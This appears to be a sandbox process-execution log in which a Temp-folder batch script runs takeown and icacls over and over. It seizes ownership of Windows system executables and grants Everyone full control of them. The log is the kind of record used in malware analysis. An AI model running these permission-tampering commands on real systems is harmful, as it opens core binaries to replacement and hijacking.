takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-certutil_31bf3856ad364e35_10.0.22000.434_none_bb381a0becef4d51\f\certutil.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-certutil_31bf3856ad364e35_10.0.22000.434_none_bb381a0becef4d51\f\certutil.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-control_31bf3856ad364e35_10.0.22000.318_none_9f38aa7663fcbf45\f\control.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-control_31bf3856ad364e35_10.0.22000.318_none_9f38aa7663fcbf45\f\control.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-control_31bf3856ad364e35_10.0.22000.318_none_9f38aa7663fcbf45\f\control.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.348_none_75b35e16f6608fe4\f\WerFault.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.348_none_75b35e16f6608fe4\f\WerFault.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.348_none_75b35e16f6608fe4\f\WerFault.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.348_none_75b35e16f6608fe4\f\WerFaultSecure.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.348_none_75b35e16f6608fe4\f\WerFaultSecure.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.348_none_75b35e16f6608fe4\f\WerFaultSecure.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-eventlog-commandline_31bf3856ad364e35_10.0.22000.469_none_c66bd96c36769493\f\wevtutil.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-eventlog-commandline_31bf3856ad364e35_10.0.22000.469_none_c66bd96c36769493\f\wevtutil.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-eventlog-commandline_31bf3856ad364e35_10.0.22000.469_none_c66bd96c36769493\f\wevtutil.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-explorer_31bf3856ad364e35_10.0.22000.469_none_574c4adf3362fbca\f\explorer.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-explorer_31bf3856ad364e35_10.0.22000.469_none_574c4adf3362fbca\f\explorer.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-explorer_31bf3856ad364e35_10.0.22000.469_none_574c4adf3362fbca\f\explorer.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-fsutil_31bf3856ad364e35_10.0.22000.282_none_d1df129ba9a9b56f\f\fsutil.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-fsutil_31bf3856ad364e35_10.0.22000.282_none_d1df129ba9a9b56f\f\fsutil.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-fsutil_31bf3856ad364e35_10.0.22000.282_none_d1df129ba9a9b56f\f\fsutil.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_11.0.22000.120_none_e2284b7d90c8a180\f\iexplore.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_11.0.22000.120_none_e2284b7d90c8a180\f\iexplore.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_11.0.22000.120_none_e2284b7d90c8a180\f\iexplore.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-i..switch-toasthandler_31bf3856ad364e35_10.0.22000.37_none_b6eb9704869b2bfc\f\InputSwitchToastHandler.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-i..switch-toasthandler_31bf3856ad364e35_10.0.22000.37_none_b6eb9704869b2bfc\f\InputSwitchToastHandler.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-i..switch-toasthandler_31bf3856ad364e35_10.0.22000.37_none_b6eb9704869b2bfc\f\InputSwitchToastHandler.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-mapi_31bf3856ad364e35_10.0.22000.120_none_b1071c7fd34df0e8\f\fixmapi.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-mapi_31bf3856ad364e35_10.0.22000.120_none_b1071c7fd34df0e8\f\fixmapi.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-mapi_31bf3856ad364e35_10.0.22000.120_none_b1071c7fd34df0e8\f\fixmapi.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-mediafoundation_31bf3856ad364e35_10.0.22000.120_none_a2190a6cc64fec46\f\mfpmp.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-mediafoundation_31bf3856ad364e35_10.0.22000.120_none_a2190a6cc64fec46\f\mfpmp.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-mediafoundation_31bf3856ad364e35_10.0.22000.120_none_a2190a6cc64fec46\f\mfpmp.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_10e4c14208d6d2d3\f\wmpconfig.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_10e4c14208d6d2d3\f\wmpconfig.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_10e4c14208d6d2d3\f\wmpconfig.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_10e4c14208d6d2d3\f\wmplayer.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_10e4c14208d6d2d3\f\wmplayer.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_10e4c14208d6d2d3\f\wmplayer.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_10e4c14208d6d2d3\f\wmpshare.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_10e4c14208d6d2d3\f\wmpshare.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_10e4c14208d6d2d3\f\wmpshare.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-msinfo32-exe-common_31bf3856ad364e35_10.0.22000.71_none_72d931253b133480\f\msinfo32.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-msinfo32-exe-common_31bf3856ad364e35_10.0.22000.71_none_72d931253b133480\f\msinfo32.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-msinfo32-exe-common_31bf3856ad364e35_10.0.22000.71_none_72d931253b133480\f\msinfo32.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-msinfo32-exe_31bf3856ad364e35_10.0.22000.71_none_987098e149e09f68\f\msinfo32.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-msinfo32-exe_31bf3856ad364e35_10.0.22000.71_none_987098e149e09f68\f\msinfo32.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-msinfo32-exe_31bf3856ad364e35_10.0.22000.71_none_987098e149e09f68\f\msinfo32.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-net1-command-line-tool_31bf3856ad364e35_10.0.22000.434_none_8c8f05900e25e4d3\f\net1.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-net1-command-line-tool_31bf3856ad364e35_10.0.22000.434_none_8c8f05900e25e4d3\f\net1.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-net1-command-line-tool_31bf3856ad364e35_10.0.22000.434_none_8c8f05900e25e4d3\f\net1.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-p..installerandprintui_31bf3856ad364e35_10.0.22000.194_none_dbc66c84afafb5a2\f\printui.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-p..installerandprintui_31bf3856ad364e35_10.0.22000.194_none_dbc66c84afafb5a2\f\printui.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-p..installerandprintui_31bf3856ad364e35_10.0.22000.194_none_dbc66c84afafb5a2\f\printui.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-p..randprintui-ntprint_31bf3856ad364e35_10.0.22000.282_none_f57e785f37294fe2\f\ntprint.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-p..randprintui-ntprint_31bf3856ad364e35_10.0.22000.282_none_f57e785f37294fe2\f\ntprint.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-p..randprintui-ntprint_31bf3856ad364e35_10.0.22000.282_none_f57e785f37294fe2\f\ntprint.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-quickassist_31bf3856ad364e35_10.0.22000.282_none_037bca9e287fff5c\f\quickassist.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-quickassist_31bf3856ad364e35_10.0.22000.282_none_037bca9e287fff5c\f\quickassist.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-quickassist_31bf3856ad364e35_10.0.22000.282_none_037bca9e287fff5c\f\quickassist.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-r..sistance-dcomserver_31bf3856ad364e35_10.0.22000.71_none_1c87d1fdc5c5037f\f\raserver.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-r..sistance-dcomserver_31bf3856ad364e35_10.0.22000.71_none_1c87d1fdc5c5037f\f\raserver.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-r..sistance-dcomserver_31bf3856ad364e35_10.0.22000.71_none_1c87d1fdc5c5037f\f\raserver.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-remoteassistance-exe_31bf3856ad364e35_10.0.22000.120_none_3d11f25cbb74100a\f\msra.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-remoteassistance-exe_31bf3856ad364e35_10.0.22000.120_none_3d11f25cbb74100a\f\msra.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-remoteassistance-exe_31bf3856ad364e35_10.0.22000.120_none_3d11f25cbb74100a\f\msra.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-remoteassistance-exe_31bf3856ad364e35_10.0.22000.120_none_3d11f25cbb74100a\f\sdchange.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-remoteassistance-exe_31bf3856ad364e35_10.0.22000.120_none_3d11f25cbb74100a\f\sdchange.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-remoteassistance-exe_31bf3856ad364e35_10.0.22000.120_none_3d11f25cbb74100a\f\sdchange.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-robocopy_31bf3856ad364e35_10.0.22000.469_none_cc9ed34da60ac9c4\f\Robocopy.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-robocopy_31bf3856ad364e35_10.0.22000.469_none_cc9ed34da60ac9c4\f\Robocopy.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-robocopy_31bf3856ad364e35_10.0.22000.469_none_cc9ed34da60ac9c4\f\Robocopy.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-runas_31bf3856ad364e35_10.0.22000.434_none_659b5b6317001d2c\f\runas.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-runas_31bf3856ad364e35_10.0.22000.434_none_659b5b6317001d2c\f\runas.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-runas_31bf3856ad364e35_10.0.22000.434_none_659b5b6317001d2c\f\runas.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-s..ative-serverbox-isv_31bf3856ad364e35_10.0.22000.120_none_fad0aab9b7fd2208\f\RMActivate_ssp_isv.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-s..ative-serverbox-isv_31bf3856ad364e35_10.0.22000.120_none_fad0aab9b7fd2208\f\RMActivate_ssp_isv.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-s..ative-serverbox-isv_31bf3856ad364e35_10.0.22000.120_none_fad0aab9b7fd2208\f\RMActivate_ssp_isv.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-s..native-whitebox-isv_31bf3856ad364e35_10.0.22000.120_none_ef0bb92fa937f7ee\f\RMActivate_isv.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-s..native-whitebox-isv_31bf3856ad364e35_10.0.22000.120_none_ef0bb92fa937f7ee\f\RMActivate_isv.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-s..native-whitebox-isv_31bf3856ad364e35_10.0.22000.120_none_ef0bb92fa937f7ee\f\RMActivate_isv.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-s..sor-native-whitebox_31bf3856ad364e35_10.0.22000.120_none_a6af4a93eb065fad\f\RMActivate.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-s..sor-native-whitebox_31bf3856ad364e35_10.0.22000.120_none_a6af4a93eb065fad\f\RMActivate.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-s..sor-native-whitebox_31bf3856ad364e35_10.0.22000.120_none_a6af4a93eb065fad\f\RMActivate.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-scripting_31bf3856ad364e35_10.0.22000.194_none_4dda7ffaba1d5c31\f\cscript.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-scripting_31bf3856ad364e35_10.0.22000.194_none_4dda7ffaba1d5c31\f\cscript.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-scripting_31bf3856ad364e35_10.0.22000.194_none_4dda7ffaba1d5c31\f\cscript.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-scripting_31bf3856ad364e35_10.0.22000.194_none_4dda7ffaba1d5c31\f\wscript.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-scripting_31bf3856ad364e35_10.0.22000.194_none_4dda7ffaba1d5c31\f\wscript.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-scripting_31bf3856ad364e35_10.0.22000.194_none_4dda7ffaba1d5c31\f\wscript.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-security-tokenbroker_31bf3856ad364e35_10.0.22000.282_none_a92d755764592be1\f\TokenBrokerCookies.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-security-tokenbroker_31bf3856ad364e35_10.0.22000.282_none_a92d755764592be1\f\TokenBrokerCookies.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-security-tokenbroker_31bf3856ad364e35_10.0.22000.282_none_a92d755764592be1\f\TokenBrokerCookies.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
